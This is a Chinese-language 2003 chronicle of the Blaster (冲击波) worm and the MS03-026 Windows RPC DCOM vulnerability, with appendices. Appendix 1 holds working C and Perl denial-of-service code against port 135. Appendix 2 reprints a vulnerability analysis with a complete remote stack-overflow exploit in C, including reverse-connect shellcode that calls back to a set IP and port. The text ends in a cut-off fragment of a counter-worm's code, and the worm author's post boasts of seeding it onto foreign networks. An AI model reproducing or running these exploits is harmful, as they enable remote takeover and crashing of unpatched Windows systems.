cjlong（原作）

冲击波内幕点滴

作者：幽谷听泉

时间：2003-07-21 上午  人物：flashsky

发现了MS WINDOWS 2000 RPC拒绝服务与本地权限提升漏洞，并提供了完整的测试代码（见
附1）。

时间：2003-07-21 下午

微软实现了该漏洞，并发布该漏洞的公告：MS03-026：RPC接口任意代码可执行漏洞

时间：2003-07-22

微软发布了针对该漏洞的补丁程序

http://www.microsoft.com/china/technet/security/bulletin/MS03-026.asp

时间：2003-07-25 09:13  人物：flashsky

在国内的某著名论坛上发表了lsd rpc溢出全分析的文章，公布了实现rpc溢出漏洞的代码，
并详细讲述了基本原理（全文见附2）。

时间：2003-07-25到2003-07-28

在该论坛上众路英雄纷纷对flashsky提供的代码进行了修改

时间：2003-8-2  发现：Worm.SdBotRPC “流言”病毒

利用RPC的漏洞攻击网络中的计算机，攻击成功后向远端系统上的RPC系统服务所监听的端口
发送攻击代码，造成远端系统无法使用RPC服务或系统崩溃。

时间：2003-8-8　　发现：用VB编程语言编写的Worm.AutoRooter病毒

时间：2003-8-10　　发现了著名的冲击波（Worm.Blaster）病毒

时间：2003-08-15  美国媒体表态："冲击波"病毒涉嫌造成大停电

http://www.duba.net/c/2003/08/15/89250.shtml

时间：2003-08-18 出现了以虫制虫的良性蠕虫，我目前还不知道该病毒的名称，先借用网
上的名称 蠕虫2004，该病毒同样通过RPC的漏洞攻击网络中的计算机，蠕虫感染系统后会自
动清除系统中的冲击波病毒，然后根据系统语言版本是简体中文、繁体中文、韩文、英文以
及系统是Windows 2000还是Windows XP分别到微软站点下载相应的MS03-026补丁，并能检测
系统时间，如果系统时间是2004年，就自动清除自身。

时间：2003-8-20    人物：peipei

蠕虫2004作者在某著名论坛现身，并公布了原代码（见附件3），全文如下：

玩过了～～　虫虫四个小时之内已经完成了任务～～～不得不写这豆腐块～～～ 
char *szMe = "=========== I love my wife & baby :)~~~ Welcome Chian~~~ 
Notice: 2004 will remove myself:)~~ sorry zhongli~~~=========== wins"; 

偶：小地方小公司小小程序员 
偶从不玩安全的，临时抱佛脚，看了些资料，仓促写了这个烂虫虫~~~ 

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ，虽然偶临时玩安全的即兴之作亦很烂 
~~~ 
B 看不惯国内某几家放毒公司的商业炒作，发网难财，违背良心，误导民众 
偶就帮你丫的除光了虫虫，打光了补丁，没想到他丫的误导的更变态~~~ 你丫的方脑壳 
~~ 
C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~ 
D VirusBOy 兄，baby 可不是情人吆，偶家小子两岁就开始跟偶抢机器了~~ 
E 长了这么大,算首次报效社会吧~~~ 
F 几年？进去就是了，不就是个坐吗， 切~~~ 偶是吓大的! 
0 chian 系 china 笔误~~ 敲的快了，某个指头先到:)~~~ 

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~ 
2 RpcDcom & WebDav 使用同一 反向shellcode, 用 eyas的, lion修改 
(声明：谁也没给偶，偶从一被人遗忘的公开程序中sniffer的,谢两位) 
此shellcode 新进程建在svchost下，就一个Call Ebx 通杀了 all 2k & xp 
他丫的，还有放毒公司言导致xp机器重启云云的~~~ 
3 Bill该死 有 Tftpd.exe, 干吗不用，虽然偶看过 Tftp 协议，练习写过~~~ 
4 某年某月某日某时某刻， 
溜出国门，辗转借了几台 Xeon(TM) 4 cpus, 2g memory 机器 
架起 2000 线程的 WebDav 投放玩具，对准某国骨干的几个B段 
10 分钟内投放了三四百个种子(早知道有这么多，就换个玩法 :)~~~ 
5 发icmp包是为了提高搜索效率，算唯一的危害了~~~ 刺激一下也好~~~ 
打补丁的虫，杀虫的虫，再不有点儿小危害就丢尽了虫虫家族的脸~~~

附1

测试代码 

#include 

#include 

#include 

#include 

#include 

#include 

 

unsigned char bindstr={ 

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
 

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
 

0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
 

0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
 

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; 

 

unsigned char request={ 

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
 

0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
 

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
 

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
 

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}; 

 

 

 

void main(int argc,char ** argv) 

{ 

WSADATA WSAData; 

int i; 

SOCKET sock; 

SOCKADDR_IN addr_in; 

 

short port=135; 

unsigned char buf1; 

printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n"); 

printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org\n"); 

printf("Welcome to http://www.xfocus.net\n"); 

if(argc<2) 

{ 

printf("useage:%s target\n",argv); 

exit(1); 

} 

 

 

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) 

{ 

printf("WSAStartup error.Error:%d\n",WSAGetLastError()); 

return; 

} 

 

addr_in.sin_family=AF_INET; 

addr_in.sin_port=htons(port); 

addr_in.sin_addr.S_un.S_addr=inet_addr(argv); 

 

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) 

{ 

printf("Socket failed.Error:%d\n",WSAGetLastError()); 

return; 

} 

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NUL
L,NULL)==SOCKET_ERROR) 

{ 

printf("Connect failed.Error:%d",WSAGetLastError()); 

return; 

} 

if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR) 

{ 

printf("Send failed.Error:%d\n",WSAGetLastError()); 

return; 

} 

 

i=recv(sock,buf1,1024,MSG_PEEK); 

if (send(sock,request,sizeof(request),0)==SOCKET_ERROR) 

{ 

printf("Send failed.Error:%d\n",WSAGetLastError()); 

return; 

} 

i=recv(sock,buf1,1024,MSG_PEEK); 

} 

 

 

#!/usr/bin/perl -w 

# By SecurITeam's Experts 

my $bindstr = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x7F\x00\x00\x00\
xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x01\x00\xA0\x01\x00\x00\
x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x04\x5D\x88\x8A\
xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00"; 

 

my $request = "\x05\x00\x00\x03\x10\x00\x00\x00\x48\x00\x00\x00\x13\x00\x00\x00\
x90\x00\x00\x00\x01\x00\x03\x00\x05\x00\x06\x01\x00\x00\x00\x00\x31\x31\x31\x31\
x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\
x31\x31\x31\x31\x31\x31\x31\x31\x00\x00\x00\x00\x00\x00\x00\x00"; 

 

use Socket; 

$proto = getprotobyname('tcp'); 

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems\n"); 

 

$IP = $ARGV; 

$target = inet_aton($IP); 

$paddr = sockaddr_in(135, $target); 

connect(S, $paddr) || die "connect: $!"; 

select(S); $|=1; 

print $bindstr; 

sleep(2); 

print $request; 

sleep(2); 

select(STDOUT); 

close(S); 

附2

LSD RPC 溢出漏洞之分析

转摘请注明作者和安全焦点

作者：FLASHSKY

作者单位：启明星辰积极防御实验室

WWW SITE：WWW.VENUSTECH.COM.CN WWW.XFOCUS.NET，WWW.SHOPSKY.COM

邮件：flashsky@xfocus.org,fangxing@venustech.com.cn,webmaster@shopsky.com

感谢BENJURRY做测试，翻译和代码的通用化处理。

邮件：benjurry@xfocus.org

 

LSD 的RPC溢出漏洞（MS03-26）其实包含了2个溢出漏洞，一个是本地的，一个是远程的。
他们都是由一个通用接口导致的。

导致问题的调用如下：

hr = CoGetInstanceFromFile(pServerInfo,NULL,0,CLSCTX_REMOTE_SERVER,STGM_READWRIT
E,L"C:\\1234561111111111111111111111111.doc",1,&qi);

这个调用的文件名参数（第5个参数，会引起溢出），当这个文件名超长的时候，会导致客
户端的本地溢出（在RPCSS中的GetPathForServer函数里只给了0X220堆栈的空间，但是是用
lstrcpyw进行拷贝的），这个我们在这里就不深入研究了(不过这个API先会检查本地文件是
否存在，在进行处理，因此由于建不了长文件，所以要利用这个溢出不能直接调用这个API
，而是构造好包信息以后直接调用LPC的函数，有兴趣的可以自己去试。),我们来讲解一下
远程的溢出。

在客户端给服务器传递这个参数的时候，会自动转化成如下格式：L“\\servername\c$\123
4561111111111111111111111111.doc"这样的形式传递给远程服务器，于是在远程服务器的
处理中会先取出servername名，但是这里没做检查，给定了0X20（默认NETBIOS名）大小的
空间，于是堆栈溢出产生了：

问题代码如下：

GetPathForServer：

.text:761543DA push ebp

.text:761543DB mov ebp, esp

.text:761543DD sub esp, 20h <-----0x20空间

.text:761543E0 mov eax, 

.text:761543E3 push ebx

.text:761543E4 push esi

.text:761543E5 mov esi, 

.text:761543E8 push edi

.text:761543E9 push 5Ch

.text:761543EB pop ebx

.text:761543EC mov , esi

.text:761543EE cmp , bx

.text:761543F1 mov edi, esi

.text:761543F3 jnz loc_761544BF

.text:761543F9 cmp , bx

.text:761543FD jnz loc_761544BF

.text:76154403 lea eax, 《-----------写入的地址，只有0X20

.text:76154406 push 0

.text:76154408 push eax

.text:76154409 push esi 〈----------------------我们传入的文件名参数

.text:7615440A call GetMachineName

。。。。。。。。。。。。。。。。。。。。。。。。。。 此函数返回的时候，溢出点生
效

 

GetMachineName:

.text:7614DB6F mov eax, 

.text:7614DB72 mov ecx, 

.text:7614DB75 lea edx, 

.text:7614DB78 mov ax, 

.text:7614DB7C cmp ax, 5Ch 〈-----------------只判断0X5C

.text:7614DB80 jz short loc_7614DB93

.text:7614DB82 sub edx, ecx

.text:7614DB84 

.text:7614DB84 loc_7614DB84: ; CODE XREF: sub_7614DA19+178j

.text:7614DB84 mov , ax 〈----------------写入上个只有0X20的空间，超过就溢出

.text:7614DB87 inc ecx

.text:7614DB88 inc ecx

.text:7614DB89 mov ax, 

.text:7614DB8D cmp ax, 5Ch

.text:7614DB91 jnz short loc_7614DB84

.text:7614DB93 

 

OK，我们现在就需要想法来利用这个漏洞，由于\\SERVERNAME是由系统自动生成的，我们只
能利用手工直接生成RPC的包来实现，另外SHELLCODE中不能包含0X5C，因为这样判断就是\\
SERVERNAME结束了。

下面就给出一个实现的代码，注意点如下：

1.由于RPCRT4，RPCSS中没有JMP ESP的代码，这里使用了OLE32.DLL中的，但是这可能是会
重定位的，大家测试的时候

需要再确定或自己找一个存在的JMP ESP的代脉，我的这是WIN2000+SP3上的地址且OLE32未
重定位情况下的。

2。这里使用了反向连接的SHELLCODE，需要先运行NC

3。程序中的SC的整体长度必须满足sizeof(sz)%16=12的关系，因为不是整数的话，整个包
的长度会有一些填充，那么

计算就不满足我这里给出的一个简单关系了，会导致RPC包的解析无效果。

4。在溢出返回前，返回地址后面的2个参数还会使用，所以需要保证是个内存可写空间地址
。

5，这里是直接使用堆栈溢出返回的，其实大家也可以尝试一下覆盖SEH，这里就不再多讲了
。

 

#include <stdio.h>

#include <winsock2.h>

#include <windows.h>

#include <process.h>

#include <string.h>

#include <winbase.h>

 

unsigned char bindstr={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,

0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

 

unsigned char request1={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03

,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

 

unsigned char request2={

0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x5C,0x00,0x5C,0x00};

 

unsigned char request3={

0x5C,0x00

,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

 

unsigned char sc=

"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"

"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"

"\x46\x00\x58\x00"

"\x46\x00\x58\x00\x25\x2b\xaa\x77" //JMP ESP地址 IN ole32.DLL，可能需要自己改动

"\x38\x6e\x16\x76\x0d\x6e\x16\x76" //需要是可写的内存地址

//下面是SHELLCODE，可以放自己的SHELLCODE，但必须保证sc的整体长度/16=12，不满足自
己填充一些0X90吧

//SHELLCODE不存在0X00，0X00与0X5C

"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"

"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"

"\x93\x40\xe2\xfa"

// code 

"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"

"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"

"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"

"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"

"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"

"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"

"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"

"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"

"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"

"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"

"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"

"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"

"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"

"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"

"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"

"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"

"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"

"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"

"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"

"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"

"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"

"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"

"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"

"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"

"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"

"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

 

unsigned char request4={

0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00

,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C

,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00

};

 

void main(int argc,char ** argv)

{

WSADATA WSAData;

SOCKET sock;

int len,len1;

SOCKADDR_IN addr_in;

short port=135;

unsigned char buf1;

unsigned char buf2;

unsigned short port1;

DWORD cb;

 

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)

{

printf("WSAStartup error.Error:%d\n",WSAGetLastError());

return;

}

 

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(port);

addr_in.sin_addr.S_un.S_addr=inet_addr(argv);

 

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

{

printf("Socket failed.Error:%d\n",WSAGetLastError());

return;

}

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NUL
L,NULL)==SOCKET_ERROR)

{

printf("Connect failed.Error:%d",WSAGetLastError());

return;

}

port1 = htons (2300); //反向连接的端口

port1 ^= 0x9393;

cb=0XD20AA8C0; //反向连接的IP地址，这里是192。168。10。210，

cb ^= 0x93939393;

*(unsigned short *)&sc = port1;

*(unsigned int *)&sc = cb;

len=sizeof(sc);

memcpy(buf2,request1,sizeof(request1));

len1=sizeof(request1);

*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; //计算文件名双字节长度

*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//计算文件名双字节长
度

memcpy(buf2+len1,request2,sizeof(request2));

len1=len1+sizeof(request2);

memcpy(buf2+len1,sc,sizeof(sc));

len1=len1+sizeof(sc);

memcpy(buf2+len1,request3,sizeof(request3));

len1=len1+sizeof(request3);

memcpy(buf2+len1,request4,sizeof(request4));

len1=len1+sizeof(request4);

*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

//计算各种结构的长度

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; 

*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;

if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d\n",WSAGetLastError());

return;

}

 

len=recv(sock,buf1,1000,NULL);

if (send(sock,buf2,len1,0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d\n",WSAGetLastError());

return;

}

len=recv(sock,buf1,1024,NULL);

}

 

补丁机理：

补丁把远程和本地的溢出都补了，呵呵，这个这么有名的东西，我也懒得多说了。

 

补记：

由于缺乏更多的技术细节，搞这个从上星期五到现在终于才搞定，惭愧，不过值得庆幸的是
其间发现了RPC DCOM DOS的漏洞。先开始被本地溢出的迷惑了很久，怎么也无法远程进入这
个函数，最后偶然的一次，让我错误的看花了眼，再远程调用的时候，以为GETSERVERPATH
是存在本地溢出的GetPathForServer函数，，心中以为远程进入了GetPathForServer函数，
仔细的跟踪，这才发现问题所在。感谢所有关心和指导我的同志们。 

附3

BOOL DoServicePackFunction() 
{ 
DWORD nSystemVer = Win2000OrXp(); 
if ( !( nSystemVer == 0 || nSystemVer == 1) ) 
return FALSE; // not 2k or xp 

if ( ReadRegServicePack(nSystemVer) ) 
return FALSE; //已经安装了 

//识别语言版本 
int nLanguageID; 
unsigned int unOemCP = GetOEMCP(); 

LCID lcid = GetSystemDefaultLCID(); 
WORD wMain = PRIMARYLANGID(lcid); 
WORD wSub = SUBLANGID(lcid); 


if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en 
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~ 
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法 
~~ 
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn 
nLanguageID = 1; //就是为这个来的~~ 
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw 
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~ 
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp 
nLanguageID = -1; //偶好有干掉鬼子机器的冲动！ 
//罢了，冤冤相报何时了~~~ 希望他丫的自新 
~~~ 再玩火就灭了他丫的~~ 
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr 
